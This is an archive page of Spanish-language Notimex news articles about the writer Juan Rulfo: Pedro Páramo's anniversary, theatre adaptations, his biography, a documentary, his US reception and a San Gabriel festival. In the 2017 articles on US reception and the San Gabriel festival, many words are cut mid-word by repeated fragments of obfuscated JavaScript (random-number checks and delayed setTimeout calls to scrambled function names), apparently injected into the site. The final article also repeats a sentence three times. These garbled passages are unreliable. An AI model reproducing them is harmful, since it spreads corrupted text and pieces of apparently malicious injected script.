Etiquetas: Juan Rulfo


Obra “Pedro Páramo” cumple 63 años de su primera edición en el FCE

18 julio, 2018

Bogotá. La obra “Pedro Páramo” de Juan Rulfo, que hoy cumple 63 años de su primera edición en el Fondo de Cultura Económica (FCE), es una joya inagotable de la narrativa hispanoamericana, que mantiene vigencia en el presente y futuro, aseguró la historiadora mexicana Luz de María Muñoz.

El FCE filial Colombia programó para este jueves en su librería en Bogotá una conferencia con Muñoz, titulada: “63 aniversario de Pedro Páramo: la novela inagotable”.

“Pedro Páramo” es una de las obras maestras de la literatura hispanoamericana. La novela cuenta cómo el protagonista, Juan Preciado, va en busca de su padre, Pedro Páramo, hasta el pueblo mexicano de Comala, un lugar vacío, misterioso, sin vida.

En Comala, el joven descubrirá que toda la gente del pueblo se llama Páramo, que muchos de ellos son sus propios hermanos, y que Pedro Páramo está muerto. Es una novela misteriosa y fantástica, cuya atmósfera envuelve al lector y lo transporta a un territorio mágico de sorprendentes ramificaciones.

En 1955 se publicó por primera vez la obra fundamental del escritor mexicano, en la que se “plasmaba una forma distinta de narrar al México profundo”.

La historiadora mexicana, en entrevista con Notimex, sostuvo que “Pedro Páramo” en sus 63 años de la primera edición es “todo un universo de sombras y significados que convirtió esta obra en un hito de la literatura mexicana y en el preludio del boom latinoamericano”.

“Es una novela corta, pero cada vez que uno la lee encuentra nuevos significados en cada momento de la historia. A través de Pedro Páramo podemos conocer el México profundo, de cómo era la idea de estos mexicanos en las zonas rurales, el arraigo con su tierra y sus ancestros”, comentó Muñoz.

A los 63 años de la primera edición, es una obra que es “muy importante para entender ese México trastocado por los conflictos por la Revolución, la guerra cristera”.

Pero también la novela “es importante porque reinventa la literatura y encuentra una nueva forma de narrar la realidad y eso es lo que hace Juan Rulfo. Este es el preludio del boom latinoamericano. El mismo Gabriel García Márquez quedó impacto cuando leyó ‘Pedro Páramo’”.

“Es una nueva forma de narrar la realidad mexicana y de entender esta nueva relación del mexicano profundo, con sus tradiciones, cómo es su relación con los muertos. Creo que a los 63 años de su primera edición sigue siendo una novela inagotable”, subrayó la historiadora.

En su opinión, “los mexicanos de hoy -que somos más urbanos, que no tenemos ese contacto con la tierra- seguimos encontrando en ‘Pedro Páramo’ nuestras respuestas de ese imaginario colectivo, de ese inconsciente colectivo, nos seguimos encontrando en la obra de Rulfo”.

“En esta novela está todo este mundo onírico, confuso, de los antepasados y esto sigue presente. Si bien no existe hoy un México rural como antaño, sí llegan a través de las familias todas estas imágenes y las seguimos teniendo presente de forma increíble”, comentó.

La relación que en la actualidad tienen los jóvenes mexicanos con la obra de Rulfo es “increíble, porque cada día se está releyendo más su obra. Estamos viviendo un nuevo auge, con nuevas biografías e investigaciones de sus dos obras, ‘El llano en llamas’ y ‘Pedro Páramo’”.

“Hoy podemos decir que están escarbando todas las facetas de Rulfo y eso es muy fascinante”, concluyó la historiadora invitada por el FCE-filial Colombia para celebrar el 63 aniversario de “Pedro Páramo”.

Fuente: Notimex


Compañía teatral representará “Macarios” basado en el cuento de Juan Rulfo

11 junio, 2018

Madrid. Con un trabajo teatral eminentemente mexicano, la compañía escénica El Curro DT presentó en esta capital “Macarios”, adaptación del cuento de Juan Rulfo, que escribió el mexicano a los 16 años retratando la doble moral humana y el ambiente rural de su país.

“Macarios”, interpretada por el fundador de la compañía, el mexicano Alberto García, por Jonatan Fernández, de Canarias y Miguel González, de Extremadura, es una apuesta de riesgo escénico de lo que puede representar un desnudo y que en voz de los actores, es una transgresión muy importante para un intérprete.

“Macarios” se inscribe dentro de la primera edición del Ciclo El Curro DT en Primavera, una muestra que incluye tres de los últimos trabajos del colectivo El Curro DT, reconocida compañía de danza teatro, que tras más de dos décadas sigue apostando por fórmulas no convencionales y arriesgadas.

En esta obra, los tres intérpretes repiten el monólogo pero adaptándolo no solo a la diferencia de edades sino a los distintos acentos que cada uno tiene.

El actor mexicano Alberto García, fundador de la compañía y alumno de Luis Rábago, considerado como el gran actor de México, explicó a Notimex que a nivel literario lo interesante que tiene Macario es que es el primer cuento que escribió Rulfo con 16 años.

“Es un acto de ingenuidad, de perversión y de contundencia que ya demuestra lo que se puede decir que es un talento nato, un genio”, dijo.

Explicó que el ejercicio que se presenta con esta obra es justo una escenificación, una dramatización del cuento de Rulfo, saber qué sucede con este personaje que en sí mismo es críptico, en sí mismo es muy hermético, cuando se interpreta por tres cuerpos distintos, en tres edades distintas”.

Además, la compañía escénica hizo un balance histórico pues Alberto ha interpretado a Macario desde hace 28 años, Jonatan desde hace poco más de 19 y Miguel apenas lo está aprendiendo.

“Es como un ejercicio de interpretación, qué sucede en un cuerpo cuando llevas haciendo eso durante tantos años, qué sucede cuando llevas más de 18 y qué sucede cuando es fresco”, sostuvo.

García subrayó la importancia de Rulfo pero además recordó que este es un trabajo que aprendió en la asignatura de Morfosintáxis en la Facultad de Filosofía y Letras en México porque lo magistral de “Macario” es que casi toda la construcción de frases es simple, con constantes expresiones de sujeto-predicado.

“Se llega a decir que el talento natural de Rulfo es a través de una construcción morfosintáctica y lleva realmente a retratar el pensamiento, la cosmogonía rural del entorno mexicano, que es como de una simpleza, una magia y una profundidad abrumadoras”, resaltó.

Aseguró que México está muy presente en el trabajo de la compañía escénica y de hecho, temáticamente, tienen cuatro trabajos, una Frida, un trabajo sobre Sor Juana Inés de la Cruz y también monólogos con otros textos de Rulfo, con otros cuentos de “El llano en llamas”.

Hay otro trabajo que se llama “Susana San Juan, hija de un minero muerto en las minas de la Andrómeda”, que es un trabajo muy especial, que hacemos la compañía en un sótano con una iluminación de velas e incluye todos los pasajes de Pedro Páramo donde se menciona a este personaje femenino, germen de todo el realismo mágico latinoamericano.

El actor destacó que México tiene una escuela de interpretación muy importante, muy sólida, “pero parece que en el país no se dan cuenta de ello”.

Anotó que es importante destacar que con “Macarios” y otros trabajos de la compañía hay un punto de vista de cómo abordar el trabajo que es eminentemente mexicano.

Por su parte, Jonatan Fernández recordó que “Macario” fue el primer monólogo que hizo pero también el primer trabajo de texto, lo primero que hizo de teatro y junto con Alberto “estuvimos destripándolo, analizándolo, viendo toda su cultura alrededor y yo sí sentía en ese momento que estaba cerca de ese personaje rural”.

Por su parte, Miguel González expresó que “lo mío fue un capricho porque lo exigí yo un poco cuando a través de la compañía, Alberto nos enseñó el trabajo y yo levanté la mano y dije que lo quería hacer”.

“Siempre he hecho trabajo de cuerpo pero ha sido el primer trabajo que tengo de texto, el primer trabajo en el que me desnudo, el primer trabajo más teatral”, concluyó.

Fuente: Notimex


Se cumplen 101 años del natalicio del gran escritor Juan Rulfo

16 mayo, 2018

México. Reconocido por su obra maestra titulada “Pedro Páramo”, el escritor mexicano Juan Nepomuceno Carlos Pérez Rulfo Vizcaíno, fue admirado y reconocido por escritores universales; de una personalidad tímida, ensimismada; reacio a las entrevistas, y en las que dio, fue parco en su hablar.

A 101 años de su natalicio, es recordado como ícono de la narrativa hispanoamericana del siglo XX.

Juan Rulfo nació el 16 de mayo de 1917 en Acapulco y de acuerdo con el portal “www.escritores.org”, debido al cambio de residencia por la violencia revolucionaria, el escritor obtuvo su registro en la Ciudad de Sayula, Guadalajara.

Rulfo fue hijo de Juan Nepomuceno Pérez Rulfo y María Vizcaíno Arias, quienes contrajeron nupcias el 31 de enero de 1914.

Su familia, compuesta también por sus hermanos Severiano, el mayor, y Francisco y Eva, se estableció en 1919 en San Gabriel, donde cuatro años después sería asesinado su padre.

Estudiante de primaria en la escuela de las monjas Josefinas, muy pequeño Juan emprendió sus primeras lecturas en la biblioteca que un cura de nombre Irineo Monroy había depositado en la casa de su madre en 1926.

Cuando cumplió 10 años fue enviado por su madre, junto con su hermano Severiano, a un internado de la capital del estado de Jalisco para continuar sus estudios.

Después de abandonar el internado, en 1932, y tras su fallido intento por ingresar a la Universidad de Guadalajara; en 1934 se trasladó a la Ciudad de México, donde asistió como oyente a los cursos de Historia del Arte en la Facultad de Filosofía y Letras, lo que aumentó su interés por la cultura autóctona mexicana.

A partir de ese momento se sabe de la actividad literaria de Rulfo, que es seguida muy de cerca por Hernández, quien en 1940 llevó a la revista “Romance”, dirigida por Juan Rejano, algunos fragmentos de la novela del jalisciense “El hijo del desaliento”, que no se publican, y de la cual sólo se conoce el fragmento que lleva por título “Un pedazo de noche”.

Luego de realizar algunos viajes por el país, Juan Rulfo regresó en 1941 a Guadalajara, donde se estableció y colaboró, junto con Efrén Hernández, en la revista “América” de la Ciudad de México.

Luego de colaborar en esta revista, dio paso a la publicación de sus obras más relevantes. Según “www.buscabiografias.com”, en 1942 aparecieron dos de sus cuentos en la Revista Pan; los cuales se integraron en “El llano en llamas” (1953).

De acuerdo con una carta que envió a su novia Clara Aparicio, un editor rechazó en 1947 su cuento “Es que somos muy pobres”, con el argumento de que es “subido de color”.

A su futura esposa también le confesó que intentaba escribir “algo” que se llamaría “Una estrella junto a la Luna”, que se convertiría después en la reconocida novela “Pedro Páramo”.

Pese al rechazo del editor, en ese año el cuento es publicado en la revista “América”. En sus cartas a Clara, Rulfo habla de sus actividades como fotógrafo aficionado, de sus viajes seguidos a los volcanes cercanos a la Ciudad de México y de su intento de trabajar en la industria del cine. Asimismo, de sus compras de libros y de su asistencia a conciertos sinfónicos, al ballet y al cine.

Un mes antes de cumplir los 31 años, Rulfo se casó con Clara Aparicio y es en ese mismo 1948 cuando se publicó su cuento “La cuesta de las comadres”, del cual semanas antes fueron leídos algunos fragmentos por la radio.

En tanto, sus primeras fotografías las publicó en 1949; mientras que en 1968 expuso una pequeña colección de sus fotos en Guadalajara. Fue hasta 1980, cuando su exhibición en el Palacio de Bella Artes acercó al público una parte de su creación.

A finales de los años 40, Juan Rulfo ingresó a la llantera Goodrich Euzkadi como agente viajero, donde se hizo presente su destacada labor fotográfica.

De 1952 a 1953 cubre su primer periodo como becario del Centro Mexicano de Escritores y del 53 al 54 el segundo.

Su primera obra publicada en forma de libro fue en el Fondo de Cultura Económica (FCE), casa editorial bajo la cual en 1953 apareció “El llano en llamas”, con 15 cuentos.

El volumen fue incrementado en su edición de 1970 con los cuentos “La herencia de Matilde Arcángel” y “El día del derrumbe”, aparecidos en revistas en 1955, el primero con algunos cambios respecto a su primera aparición.

A mediados de 1954, Rulfo entregó al Centro Mexicano de Escritores una copia mecanográfica, con unas pocas correcciones a mano, de la novela que en ese momento llevaba el título de “Los murmullos”, y que en entrega posterior al FCE cambiaría por el de “Pedro Páramo”.

Pasajes de este su trabajo de más largo aliento habrían de aparecer ese mismo año en las revistas “Letras patrias”, “Revista de la Universidad” y “Dintel”, y no fue sino hasta 1955 cuando fue publicada íntegra por el FCE.

En 1957, se desarrolló como editor en el Instituto Nacional Indigenista (INI) en la Ciudad de México.

Considerado como uno de los exponentes de la literatura universal, Juan Rulfo es autor de obras como “La vida no es muy seria en sus cosas” (1945). Además, algunos de sus cuentos fueron llevados a la pantalla grande, ejemplo de ello es “Tlapa”, filme que se dio a conocer 1956.

Por lo anterior, la página web “www.biografiasyvidas.com”, señala que Juan Rulfo también escribió guiones cinematográficos como “Paloma herida” y “El gallo de oro”. También fue cinefotógrafo y asesor histórico en la filmación de “La escondida” (1955) de Roberto Gavaldón.

Entre las distinciones que recibió el escritor mexicano se encuentran el Premio Xavier Villaurrutia (1956) y el Premio Nacional de Literatura en México (1970).

Rulfo falleció el 7 de enero de 1986, no sin antes ser publicado su libro de fotografías “Inframundo” (1981) y recibir en 1983 el Premio Príncipe de Asturias.

Fuente: Notimex


Presentará Canal 22 documental sobre la vida de Juan Rulfo

29 noviembre, 2017

México. La serie documental “Cien años con Rulfo”, que muestra la vida del escritor jalisciense, así como sus facetas de escritor, fotógrafo y participación en el cine, será transmitida por el Canal 22 todos los jueves a parir del 30 de noviembre en su horario estelar.

En un comunicado, la televisora cultural dijo que la producción es un “crisol” sobre la obra literaria de Juan Rulfo (1917-1986), así como su relación con la fotografía y el cine, por medio del cual se podra descubrir a este polifacético personaje.

Recordó que en varias ocasiones el autor se relacionó con el cine y trabajó como guionista en los cortometrajes “El despojo” (1960) y “La fórmula secreta” (1964), además de apoyar en el guion de “Paloma herida” (1962), dirigida por Emilio “El indio” Fernández.

Además, la novela “El Gallo de oro”, escrita por Rulfo, fue llevada al cine en dos ocasiones, la primera en 1964 adaptada por Roberto Gavaldón, mientras que la segunda se llamó “El imperio de la fortuna” y fue dirigida por Arturo Ripstein en 1985.

En 1999 su hijo Juan Carlos Rulfo realizó el documental “Del olvido al no me acuerdo”, donde se muestran paisajes de Jalisco acompañados de la narración de los escritores Juan José Arreola (1918-2001) y Jaime Sabines (1926-1999″, refirió la televisora cultural.

Respecto al documental dirigido por Carlo Rulfo, Canal 22 recordó que en él se puede apreciar “el tiempo, cuestión que evoca la línea fantasiosa entre la vida y la muerte que el literato plasmo en sus obras”.

Destacó que la Cineteca Nacional se sumará a este homenaje con un ciclo que reúne alrededor de 15 películas sobre su trabajo como guionista, asesor e incluso actor.

Recordó por último que el pasado 16 de mayo se cumplieron 100 años del nacimiento del escritor, autor del libro de cuentos “El llano en llamas” y de la novela “Pedro Páramo”.

Fuente: Notimex


Obra de Rulfo interesa cada vez más en EU

27 mayo, 2017

Bogotá. La obra de Juan Rulfo interesa cada vez más a los lectores y a la academia en Estados Unidos, ya que el autor de “Pedro Paramo” y “Llano en Llamas” se mantiene vigente en la literatura universal, aseguró el escritor mexicano Roberto García Bonilla.

García Bonilla, quien es un estudioso de la vida y obra de Rulfo, participó junto con el escritor colombiano Conrado Zuluaga, en un conversatorio sobre lo real y lo mágico en las obras de Juan Rulfo y Gabriel García Márquez, organizado por el Fondo de Cultura Económica (FCE), filial Colombia.

Con este conversatorio y otros eventos que se realizaron entre abril y mayo, el FCE en Colombia celebró la vida y obra de dos de los más grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}es escritores de Latinoamérica: Rulfo, quien este año cumplió 100 años de su natalicio; y Gabriel García Márquez 90 años.

En entrevista con Notimex, García Bonilla dijo que la vida y obra de Rulfo están ganandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o espacio entre los lectores y la academia de Estados Unidos y esto tiene que ver “con una especie de reconocimiento de la obra que ha sido como una especie de ida y de regreso en Europa y el reconocimiento de muchos escritores”.

“No olvidemos lo que dice alguien como (escritora) Susan Sontag: Rulfo era el escritor más importante en el siglo XX y era el mejor fotógrafo en América Latina. Estas miradas están dandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o una especie de impacto a los lectores, pero yo creo que básicamente ese impacto es a la academia”, subrayó.

En Estados Unidos ya hay una “pequeña industria académica” frente a la obra de Rulfo, sostuvo García Bonilla, quien recordó que en “1999 Dante Medina calculaba que había unas 400 tesis sobre Rulfo en la academia”.

Estas 400 tesis sobre la vida y la obra de Rulfo en la academia de Estados Unidos puede “parecer poco tomandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o en cuenta las academias y el número de estudiantes, pero no son pocos tratándose de un escritor mexicano, cuyas obras se habían publicado medio siglo antes”.

Una de las razones para que la vida y la obra de Rulfo impacten en Estados Unidos, es porque cien años después de su natalicio, el escritor mexicano este más vigente que nunca.

La vigencia de Rulfo “está presente en la violencia. Hay una especie de metáfora de que los muertos somos los hombres viviendo, que estamos enajenados y condicionados por el sistema globalizado”, explicó García Bonilla, autor de “Un tiempo suspendido. Cronología de la vida y la obra de Juan Rulfo (Conaculta, 2008).

“Somos los muertos -dijo García Bonilla- somos los que tenemos que ir al trabajo, explotados, alienados en nuestra tumba que es nuestro escritorio o en nuestra casa tomandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o el café y diciendo mira como me pasa esto, como me pasa lo otro. Podemos decirlo pero no podemos ir mucho más lejos, ya no podemos cambiar nada”.

Para el escritor y periodista mexicano (1960), antes “podíamos decir bueno quiero cambiar de trabajo, pero ahora quien se puede darse el lujo de decir, no me gusta este trabajo porque quiero ser más libre y poderoso. No, solamente unos cuantos privilegiados pueden decir eso. Y eso es Rulfo”.

El autor de “Pedro Paramo” – según García Bonilla- mantiene vivo el cacicazgo, el poder piramidal, el existencialismo y la relación de Amo-Siervo. “Antes tenían nombre y podíamos hablar de un mundo y de una economía que funcionaba, pero ahora ya ni siquiera es eso porque la globalización es un anonimato completo pero es una efectividad atroz”.

“Antes uno iba al restaurante y uno veía que los precios subían cada año o cada dos años. Ahora es cada mes, cada semana está subiendo, porque es un sistema económico que está empujandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o del mismo modo que los personajes novelescos en Rulfo que están condenados y se pueden dar el gusto de decir lo que piensan, pero además de una manera poética”, dijo el escritor mexicano

La lectura en Pedro Paramo es “poética, nada más es recordar los pasajes de Susana San Juan y ciertos diálogos de ella para que veamos que no es una linealidad, que no está contandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o de manera directa, no está narrandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o de manera realista como una novela testimonial, no lo está haciendo”.

La obra de García Márquez, también tiene un impacto, quizá mayor que la de Rulfo en Estados Unidos, lo que se ve reflejado en las ventas editoriales.

“Lo que puedo ver en la obra de García Márquez -anotó- es que cualquier tipo de gente de estrato social lo lee, igual que Rulfo, pero en García Márquez es mucho mayor. Tengo que decir con franqueza que he visto mucho más gente en el metro en México leyendo a García Márquez, que a Rulfo”.

García Bonilla admitió que la obra de Rulfo es más compleja, porque a la primera lectura no la puedes entender. Rulfo siempre está sugiriendo todo el tiempo. Está construyendo un mundo pero hacia abajo, lleno de poesía que no es tan fácil de imaginar”.

“En cambio García Márquez, está contandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o una historia casi mitológica y al mismo tiempo real. Uno puede leer las genealogías que también existen en Pedro Páramo, pero uno las ve con más evidencia en Cien años de soledad”, enfatizó el escritor.

Fuente: Notimex


Legado de Rulfo consolida a San Gabriel como polo de desarrollo cultural

23 mayo, 2017

San Gabriel, Jal. La figura de Juan Rulfo, en el marco del centenario de su nacimiento, consolidó al municipio que amaba y a donde él decía pertenecer, San Gabriel, Jalisco, como el principal polo de desarrollo cultural del occidente del país.

Durante el XX Festival Cultural 2017, a donde asistieron alrededor de 10 mil personas en los días en que se desarrollaron 27 eventos, principalmente en la plaza Revolución, la misma explanada que desde el martes 16 de mayo lleva el nombre de plaza “Juan Rulfo”.

Habitantes del pueblo de San Gabriel, visitantes nacionales y extranjeros, que se dieron cita a la fiesta cultural en el “Llano Grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e”, acudieron a las actividades culturales y artísticas.

Entre ellas, destacó en el ámbito literario y profesional un coloquio de periodistas y escritores en torno al impacto de la obra de Juan Rulfo en la actividad periodística, un certamen estatal de cuento y la presentación de la cantante de talla internacional Lila Downs.

También incluyeron en el programa actividades de danza, teatro, música, cuentos y análisis de la literatura Rulfinana, en el programa llevado a cabo del 12 al 21 de mayo.

Los organizadores diseñaron visitas guiadas en San Gabriel a lugares que cita Juan Rulfo en su obra o que marcaron su vida por los acontecimientos trágicos que le tocó enfrentar, o por los instantes felices que gozó en su infancia.

La que fuera su casa, ubicada frente a la parroquia del Señor del Dulce Nombre, el kiosco de la plaza principal, los portales del Siglo XVII; la que fuera su primaria, en el excolegio de las madres Josefinas.

El cerro de La Loma, donde volaba papalotes y los cerritos de Los Garambullos, el Petacal y Los Comales, lugares que inspiraron el “El Llano en Llamas” y “Pedro Páramo” -esta última obra, traducida incluso al idioma chino-, fueron puntos de referencia durante estos días para los seguidores de Rulfo.

Dentro de las actividades destacó la primera entrega de la presea “Rostros del Llano”, un coloquio de periodistas y escritores entorno a la narrativa Rulfiana, el concierto de la cantante internacional Lila Downs, así como las presentaciones del ballet folklórico de la Universidad de Guadalajara y de la Orquesta Filarmónica de Jalisco.

En el escenario de las ruinas de lo que fuera la hacienda de Telcampana, se efectuó el tradicional recorrido de “El Llano en Llamas”, una interpretación del momento en que el cuerpo del padre de Rulfo (Juan Nepomuceno Pérez Rulfo), era cargado por varias personas rodeado de antorchas tras haber sido asesinado.

Este evento fue acompañado por la representación teatral “Las mujeres de Pedro Páramo” de la compañía Huitzil de Guadalajara y cerró con la interpretación artística de la cantante Marilú Plascencia.

El grupo Teatrerías y Colectivo Juglar realizó obra y lectura dramatizada en la plaza Juan Rulfo, donde también se presentaron grupos como: el ballet folklórico de la Casa de la Cultura de San Gabriel, “Yo soy Jalisco” de Guadalajara, la bandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a Ireneo Monroy y la Sinfónica de Zapotitlán de Vadillo (ECOS).

En la Casa de la Cultura se leyeron cuentos y se entregaron reconocimientos del Taller de Cuento Creación Literaria y del XI Concurso Estatal de cuento “Un pueblo en la llanura”, este último otorgó el primer lugar a Yolandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a Zamora por su obra “Desde lo alto”.

En el mismo escenario se presentó el libro “Comalas de Jaliscolimán” auspiciado por la Benemérita Sociedad de Geografía y Estadística del Estado de Jalisco, capítulo Sur y Juan Rulfo fue visto desde Argentina, a través de los ojos del escritor y catedrático argentino Carlos Daniel Aletto.

Aletto hizo un análisis de la obra de “Pedro Páramo”, que resumió como una literatura que describe de manera poética los descensos a la muerte, al infierno y a los sueños.de la obra de Pedro Páramo, la cual resume como una literatura que describe de manera poética los descensos a la muerte, al infierno y a los sueños.is de la obra de Pedro Páramo, la cual resume como una literatura que describe de manera poética los descensos a la muerte, al infierno y a los sueños.

En el cierre del XX Festival Cultural San Gabriel 2017, en homenaje al escritor Juan Rulfo por el centenario de su nacimiento, de igual forma asistió la compañía de teatro “Bambalinas” de la Universidad de Colima, dirigida por Rodrigo Cervantes, quienes escenificaron el recorrido de “Los Murmullos” por los lugares hipotéticos de la obra Rulfiana en San Gabriel.

Fuente: Notimex